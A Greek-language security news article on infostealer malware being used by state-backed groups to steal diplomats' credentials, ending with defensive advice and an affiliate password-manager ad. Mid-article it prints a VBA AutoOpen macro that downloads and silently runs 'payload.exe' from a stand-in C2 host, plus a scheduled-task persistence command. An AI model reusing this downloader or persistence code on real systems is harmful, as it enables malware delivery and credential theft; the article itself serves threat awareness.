Το infostealer malware, το οποίο αρχικά σχεδιάστηκε για να συλλέγει μαζικά credentials από παραβιασμένα συστήματα, έχει εξελιχθεί σε ένα ισχυρό όπλο για τις κρατικά υποστηριζόμενες hacking ομάδες (Advanced Persistent Threat – APT).

Από τις αρχές του 2023, malware όπως τα RedLine, Lumma και StealC έχουν διαδοθεί μέσω εκστρατειών phishing και κακόβουλων λήψεων. Αυτά τα infostealers συλλέγουν δεδομένα από προγράμματα περιήγησης, cookies και πληροφορίες συστήματος, αλλά πρόσφατες πληροφορίες αποκαλύπτουν μια ανησυχητική αλλαγή: τα διαπιστευτήρια , που κλέβουν αυτά τα infostealer, τώρα χρησιμοποιούνται ως όπλα για ιδιαίτερα στοχευμένες επιχειρήσεις κατασκοπείας.
Οι κύριοι τρόποι επίθεσης για τα infostealers παραμένουν τα spear-phishing emails που περιέχουν έγγραφα με κακόβουλα macros ή ψεύτικα software installers. Τα θύματα λαμβάνουν ένα συνημμένο Word με ένα macro VBA που, όταν ενεργοποιηθεί, κατεβάζει το stealer payload από έναν διακομιστή εντολών και ελέγχου (C2).
Δείτε επίσης: ‘Sindoor Dropper’: Νέα malware καμπάνια στοχεύει Linux
Μετά την εκτέλεση, το κακόβουλο λογισμικό εντοπίζει και εξάγει αποθηκευμένα διαπιστευτήρια για email, VPN και εταιρικές πύλες SSO.
Αναλυτές infostealer malware σημείωσαν ότι παραβιασμένα διαπιστευτήρια διπλωματών από πολλά Υπουργεία Εξωτερικών έχουν εμφανιστεί σε dumps του darknet, παρέχοντας πρόσβαση σε στόχους υψηλής αξίας.
Μόλις οι ομάδες APT αποκτήσουν έγκυρα διαπιστευτήρια email – συχνά μέσω μολύνσεων Infostealer – δημιουργούν πρόσθετες εκστρατείες spear-phishing. Αυτές οι εκστρατείες παρακάμπτουν τις παραδοσιακές ανιχνεύσεις χρησιμοποιώντας την αξιοπιστία των αποστολέων και έγκυρα πιστοποιητικά TLS.

Μέχρι τα μέσα του 2025, η πλατφόρμα απειλών της Hudson Rock ανίχνευσε πάνω από 1.400 παραβιασμένους χρήστες στο Υπουργείο Εξωτερικών του Κατάρ και εκατοντάδες άλλους στη Σαουδική Αραβία, τη Νότια Κορέα και τα ΗΑΕ.
Δείτε επίσης: JSCoreRunner: Mac malware διανέμεται μέσω PDF Conversion Site
Σε ένα περιστατικό, που εξέτασαν οι ερευνητές, ένας παραβιασμένος λογαριασμός της πρεσβείας του Ομάν στο Παρίσι χρησιμοποιήθηκε για να μεταδώσει κακόβουλες προσκλήσεις σε αξιωματούχους του ΟΗΕ. Το email περιείχε ένα έγγραφο Word με ένα macro “sysProcUpdate” που εκτελούσε το ακόλουθο VBA code snippet:
Sub AutoOpen()
Dim objXML As Object
Set objXML = CreateObject("MSXML2.XMLHTTP")
objXML.Open "GET", "https://malicious.c2.server/payload.exe", False
objXML.Send
If objXML.Status = 200 Then
With CreateObject("ADODB.Stream")
.Type = 1
.Open
.Write objXML.responseBody
.SaveToFile Environ("TEMP") & "\update.exe", 2
End With
Shell Environ("TEMP") & "\update.exe", vbHide
End If
End SubΜετά την παράδοση, το “update.exe” payload δημιουργεί persistence δημιουργώντας ένα Windows Scheduled Task:
schtasks /Create /SC MINUTE /MO 15 /TN "SysProcUpdate" /TR "%TEMP%\update.exe"Ερευνητές εντόπισαν ότι αυτός ο μηχανισμός persistence εξασφαλίζει επαναλαμβανόμενη εκτέλεση ακόμη και μετά από επανεκκινήσεις του συστήματος, διευκολύνοντας την μακροπρόθεσμη πρόσβαση.
Εμβαθύνοντας στον μηχανισμό μόλυνσης, τα infostealer εκμεταλλεύονται την εμπιστοσύνη των χρηστών και τον ανεπαρκή έλεγχο των τελικών σημείων.
Μετά την αρχική παραβίαση μέσω phishing, το payload χρησιμοποιεί κοινά Windows APIs – όπως το CryptUnprotectData – για να αποκρυπτογραφήσει αποθηκευμένα διαπιστευτήρια από προγράμματα περιήγησης και το Windows Credential Manager.
🔑 Ασφαλίστε τους κωδικούς σας με Proton Pass
Password manager από την Proton — end-to-end κρυπτογράφηση, passkeys, ενσωματωμένο 2FA και παρακολούθηση για διαρροές των στοιχείων σας.
- ✔ Κρυπτογραφημένη αποθήκευση κωδικών & passkeys
- ✔ Ειδοποίηση αν κάποιος κωδικός σας διέρρευσε (Dark Web Monitoring)
- ✔ Δωρεάν έκδοση — σε όλες τις συσκευές
Ο σύνδεσμος είναι συνεργατικός (affiliate) — το SecNews ενδέχεται να λάβει προμήθεια χωρίς επιπλέον κόστος για εσάς. Δεν επηρεάζει την ανεξαρτησία της αρθρογραφίας μας.
Δείτε επίσης: Velociraptor: Κατάχρηση του εργαλείου DFIR για remote access
Η μονάδα εξαγωγής στη συνέχεια συσκευάζει τα συλλεγμένα δεδομένα σε κρυπτογραφημένα blobs και τα μεταδίδει μέσω HTTPS για να αποφύγει τα συστήματα ανίχνευσης εισβολών.
Μόλις τα διαπιστευτήρια φτάσουν στην υποδομή των επιτιθέμενων, οι ομάδες APT τα χρησιμοποιούν ως νόμιμες συνδέσεις, παρακάμπτοντας τον πολυπαραγοντικό έλεγχο ταυτότητας.
Ενσωματώνοντας το κακόβουλο λογισμικό μέσα σε έγγραφα που φαίνονται νόμιμα και μιμούμενοι νόμιμα maintenance tasks, οι επιτιθέμενοι διατηρούν χαμηλό προφίλ, καθιστώντας την ανίχνευση εξαιρετικά δύσκολη.

Προστασία από infostealer malware
Οι μέθοδοι στατικής ανίχνευσης για ασφάλεια δεν είναι αρκετές για την αποφυγή malware. Μια πιο ισχυρή προσέγγιση θα πρέπει να ενσωματώνει λογισμικό προστασίας από ιούς, εξοπλισμένο με προηγμένες δυνατότητες ανάλυσης.
Επίσης, είναι σημαντικό να διατηρείτε το λειτουργικό σύστημα και τις εφαρμογές σας ενημερωμένες. Οι ενημερώσεις αυτές συχνά περιλαμβάνουν διορθώσεις ασφαλείας που μπορούν να προστατεύσουν τον υπολογιστή σας από τις πιο πρόσφατες απειλές.
Η εκπαίδευση στην ασφάλεια των πληροφοριών είναι επίσης ζωτικής σημασίας. Αυτό σημαίνει ότι πρέπει να γνωρίζετε πώς να αναγνωρίζετε και να αποφεύγετε τις επιθέσεις phishing, τις οποίες οι επιτιθέμενοι συχνά χρησιμοποιούν για να εγκαταστήσουν infostealer.
Δείτε επίσης: PromptLock: Το πρώτο AI-powered ransomware
Επίσης, μην ξεχνάτε τη χρήση firewalls και την παρακολούθηση του network traffic που θα σας βοηθήσει να εντοπίσετε άμεσα ύποπτη δραστηριότητα. Συνιστάται, ακόμα, να αποφεύγετε εκτελέσιμα αρχεία που λαμβάνονται από περίεργους ιστότοπους.
Τέλος, η χρήση δυνατών κωδικών πρόσβασης και η ενεργοποίηση της διαδικασίας επαλήθευσης δύο παραγόντων μπορεί να προσφέρει επιπλέον επίπεδο προστασίας. Αυτό μπορεί να δυσκολέψει τους επιτιθέμενους να αποκτήσουν πρόσβαση στον λογαριασμό σας, ακόμη και αν καταφέρουν να κλέψουν τον κωδικό πρόσβασής σας.
